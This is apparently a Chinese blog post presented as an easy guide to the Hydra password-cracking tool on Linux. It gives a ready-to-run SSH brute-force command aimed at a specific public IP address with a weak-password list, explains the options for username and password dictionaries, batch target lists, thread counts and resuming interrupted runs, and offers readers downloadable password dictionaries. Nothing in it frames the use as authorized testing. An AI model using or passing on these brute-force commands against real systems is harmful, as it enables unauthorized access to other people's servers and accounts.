Liunx下hydra工具的简易食用指南

hydra（thc hydra）是一个在线密码攻击工具。支持Linux、Windows、Mac平台安装它在telnet、ssh、http、https、smb、snmp、smtp等实时服务上强制各种组合。由于Kali Linux中自带Hydra，我这边就不介绍怎么安装Hydra，有需要的可以百度下，很容易找到，下面直接讲如何用它。

下面以示例演示下SSH 暴 力登录：

hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

root# hydra -l root -P /root/桌面/weakpass/top500_pass.txt -t 2 -vV -e ns 36.137.21.162 ssh

参数：

-l login 小写，指定用户名进行破解

-L file 大写，指定用户的用户名字典

-p pass 小写，用于指定密码破解，很少使用，一般采用密码字典。

-P file 大写，用于指定密码字典。

-e ns 额外的选项，n：空密码试探，s：使用指定账户和密码试探

-M file 指定目标ip列表文件，批量破解。

-o file 指定结果输出文件

-f 找到第一对登录名或者密码的时候中止破解。

-t tasks 同时运行的线程数，默认是16

-w time 设置最大超时时间，单位

-v / -V 显示详细过程

-R 恢复爆破（如果破解中断了，下次执行 hydra -R /path/to/hydra.restore 就可以继续完成任务。）

-x 自定义密码。

破解成功，会直接显示结果。

******密码本需要自己收集，有需要的话我这边也有网上大佬收集很全的密码本，需要的可以自行下载，喜欢我的帖子记得点赞收藏：